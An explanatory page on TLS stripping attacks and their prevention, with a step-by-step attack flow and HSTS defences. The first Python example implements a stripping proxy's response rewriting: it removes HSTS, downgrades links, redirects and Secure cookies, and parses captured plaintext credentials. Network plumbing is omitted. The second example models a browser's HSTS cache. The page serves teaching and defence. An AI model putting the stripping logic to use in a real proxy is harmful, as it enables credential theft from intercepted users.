TLS Stripping

TLS Stripping (also called SSL Stripping) is a man-in-the-middle attack that downgrades a victim's connection from HTTPS to plain HTTP. The attacker keeps an HTTPS session to the real server while serving the victim unencrypted HTTP, so everything the victim sends and receives passes through the attacker in plaintext. The attack does not break TLS; it prevents the victim's browser from ever using it.

How It Works

When the victim's browser sends an unencrypted request (for example because the address was typed without a scheme and the browser defaulted to http://, or a link on an HTTP page pointed there), the attacker intercepts it, fetches the page from the legitimate server over HTTPS, and returns the content to the victim over HTTP. Because the victim's browser never negotiates TLS, it never sees a certificate and raises no warning; the page loads without the padlock, which most users do not notice.

Attack Flow

1. Victim types "bank.com" in browser
   - Browser requests: http://bank.com (no scheme typed, no HSTS entry cached)

2. Attacker intercepts request
   - Attacker connects to: https://bank.com (HTTPS)
   - Server responds with HTTPS content; if it first answers with a redirect to https://, the attacker follows it instead of passing it to the victim

3. Attacker serves content to victim
   - Attacker serves: http://bank.com (HTTP)
   - Rewrites all https:// links, form actions and Location redirects to http://

4. Victim submits credentials over HTTP
   - Attacker captures plaintext credentials
   - Forwards them to the legitimate server over HTTPS, so the login succeeds and the victim notices nothing
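The rewriting in steps 3 and 4, as an added example that is not from the original page or from any particular tool: the functions below transform a server response for delivery over HTTP the way a stripping proxy does, and parse the form fields the victim then posts in plaintext. The response headers, page body and login POST are constructed sample data; the attacker's upstream HTTPS fetch and the network forwarding are left out so that only the transformation logic is shown.

```python
"""Stripping-proxy response transformation (added illustrative example)."""
import re
from urllib.parse import parse_qs

HTTPS_SCHEME = re.compile(rb"https://", re.IGNORECASE)


def strip_headers(headers: dict) -> dict:
    """Rewrite a server response header set so the victim stays on plain HTTP.

    Rules applied:
      * Strict-Transport-Security is dropped so the browser never learns to
        upgrade on its own.
      * Location: https://... becomes http:// so redirects do not push the
        victim back to TLS.
      * The Secure flag is removed from Set-Cookie: browsers will not use a
        Secure cookie on an http:// origin, and the session would break.
      * The upgrade-insecure-requests CSP directive is removed, since it
        would make the browser upgrade sub-resource requests itself.
    """
    out = {}
    for name, value in headers.items():
        lname = name.lower()
        if lname == "strict-transport-security":
            continue
        if lname == "location":
            value = re.sub(r"^https://", "http://", value, flags=re.IGNORECASE)
        elif lname == "set-cookie":
            value = re.sub(r";\s*secure(?=;|$)", "", value, flags=re.IGNORECASE)
        elif lname == "content-security-policy":
            directives = [d.strip() for d in value.split(";") if d.strip()]
            value = "; ".join(d for d in directives
                              if d.lower() != "upgrade-insecure-requests")
        out[name] = value
    return out


def strip_body(body: bytes) -> bytes:
    """Rewrite every https:// reference (links, form actions, scripts) to http://."""
    return HTTPS_SCHEME.sub(b"http://", body)


def strip_response(status: int, headers: dict, body: bytes):
    """Downgrade a full upstream HTTPS response for delivery to the victim over HTTP."""
    return status, strip_headers(headers), strip_body(body)


def capture_form_fields(request_body: bytes) -> dict:
    """Parse an application/x-www-form-urlencoded POST the victim sent in plaintext."""
    return {k: v[0] for k, v in parse_qs(request_body.decode("utf-8")).items()}


# Constructed sample upstream response, as the legitimate server would send it over HTTPS.
SAMPLE_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Set-Cookie": "session=abc123; Secure; HttpOnly; Path=/",
    "Content-Security-Policy": "default-src 'self'; upgrade-insecure-requests",
}
SAMPLE_BODY = (
    b'<a href="https://bank.com/accounts">Accounts</a>\n'
    b'<form action="https://bank.com/login" method="post">'
    b'<input name="user"><input name="pass" type="password"></form>'
)
# Constructed sample login POST from the victim, arriving over HTTP.
SAMPLE_LOGIN = b"user=alice&pass=hunter2"

if __name__ == "__main__":
    status, headers, body = strip_response(200, SAMPLE_HEADERS, SAMPLE_BODY)
    print(status, headers)
    print(body.decode())
    print("captured:", capture_form_fields(SAMPLE_LOGIN))
```

Note that nothing here touches TLS itself: the attacker's upstream connection to bank.com is a perfectly valid HTTPS session, which is why the server sees nothing unusual either.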

Attack Requirements

  • An on-path (man-in-the-middle) position: ARP spoofing on the same LAN, a rogue Wi-Fi access point, or a compromised router or proxy
  • The victim's first request to the site leaves the browser as plain HTTP (address typed without https://, or a link from an HTTP page); a browser that defaults typed addresses to HTTPS removes this opportunity
  • No HSTS entry for the target domain in the victim's browser, neither cached from an earlier HTTPS visit nor shipped in the preload list

Prevention

  • HSTS: send Strict-Transport-Security (for example max-age=31536000; includeSubDomains) over HTTPS so the browser upgrades later http:// requests itself, before they leave the machine. Browsers ignore the header over plain HTTP, so the first visit must already be clean.
  • HSTS Preload: submit the domain to the browser preload list (requires the preload directive, includeSubDomains and a max-age of at least one year) so that even the very first visit is upgraded
  • Redirect HTTP to HTTPS on the server. On its own this does not stop stripping, because the attacker follows the redirect and the victim never sees it; it matters because it gets a clean HTTPS visit, and with it the HSTS header, into the browser.
  • Serve everything over HTTPS and never link to http:// URLs, so that no plaintext request exists for the attacker to intercept
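Why HSTS stops the attack while a server-side redirect alone does not, as an added example that is not part of the original page: the class below models the browser's HSTS cache as RFC 6797 describes it (exact-host and includeSubDomains matching, max-age expiry, max-age=0 removal, and the rule that the header is ignored when received over plain HTTP) plus a tiny preload list. The host names and the preload set are constructed for the example; the real preload list ships inside the browser.

```python
"""Browser-side HSTS cache model (added illustrative example, not browser code)."""
import time
from urllib.parse import urlsplit, urlunsplit


class HstsCache:
    """Decides whether an http:// URL is upgraded to https:// before any request is sent."""

    def __init__(self, preload=(), now=time.time):
        # host -> (expiry timestamp, includeSubDomains flag), learned from HTTPS responses
        self.entries = {}
        # Preloaded hosts (constructed); real preload entries always cover subdomains
        self.preload = set(preload)
        self.now = now  # injectable clock so expiry can be exercised

    def observe(self, host: str, header: str, over_https: bool) -> None:
        """Process a Strict-Transport-Security header received from host."""
        if not over_https:
            # RFC 6797: ignored over plain HTTP, so an attacker cannot poison the cache
            return
        max_age = None
        include_subdomains = False
        for directive in header.split(";"):
            name, _, value = directive.strip().partition("=")
            name = name.strip().lower()
            if name == "max-age":
                try:
                    max_age = int(value.strip().strip('"'))
                except ValueError:
                    return  # malformed header: ignore it entirely
            elif name == "includesubdomains":
                include_subdomains = True
        if max_age is None:
            return  # max-age is mandatory
        if max_age == 0:
            self.entries.pop(host.lower(), None)  # max-age=0 tells the browser to forget the host
            return
        self.entries[host.lower()] = (self.now() + max_age, include_subdomains)

    def is_known(self, host: str) -> bool:
        """True if host is covered by a preload entry or an unexpired cached entry."""
        labels = host.lower().split(".")
        for i in range(len(labels)):
            candidate = ".".join(labels[i:])
            if candidate in self.preload:
                return True
            entry = self.entries.get(candidate)
            if entry is None:
                continue
            expiry, include_subdomains = entry
            if expiry <= self.now():
                continue  # expired entry protects nothing
            if i == 0 or include_subdomains:
                return True  # exact match, or a parent that opted its subdomains in
        return False

    def rewrite(self, url: str) -> str:
        """Return the URL the browser will actually request."""
        parts = urlsplit(url)
        if parts.scheme == "http" and parts.hostname and self.is_known(parts.hostname):
            return urlunsplit(("https", parts.netloc, parts.path, parts.query, parts.fragment))
        return url


def first_visit_reaches_attacker(cache: HstsCache, typed_url: str) -> bool:
    """A stripping attacker only ever sees the request if the browser sends it as http://."""
    return cache.rewrite(typed_url).startswith("http://")


if __name__ == "__main__":
    cache = HstsCache(preload={"bank.example"})
    print(cache.rewrite("http://bank.example/login"))                # preloaded: upgraded
    print(first_visit_reaches_attacker(cache, "http://shop.example/"))  # unknown host: True
```

The interesting case is the first visit to a host that is neither preloaded nor cached: the request leaves the browser as http://, the attacker answers it, and the server's redirect and HSTS header never reach the victim. Everything after that first clean HTTPS visit is protected for max-age seconds; preloading closes the initial window.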

See Also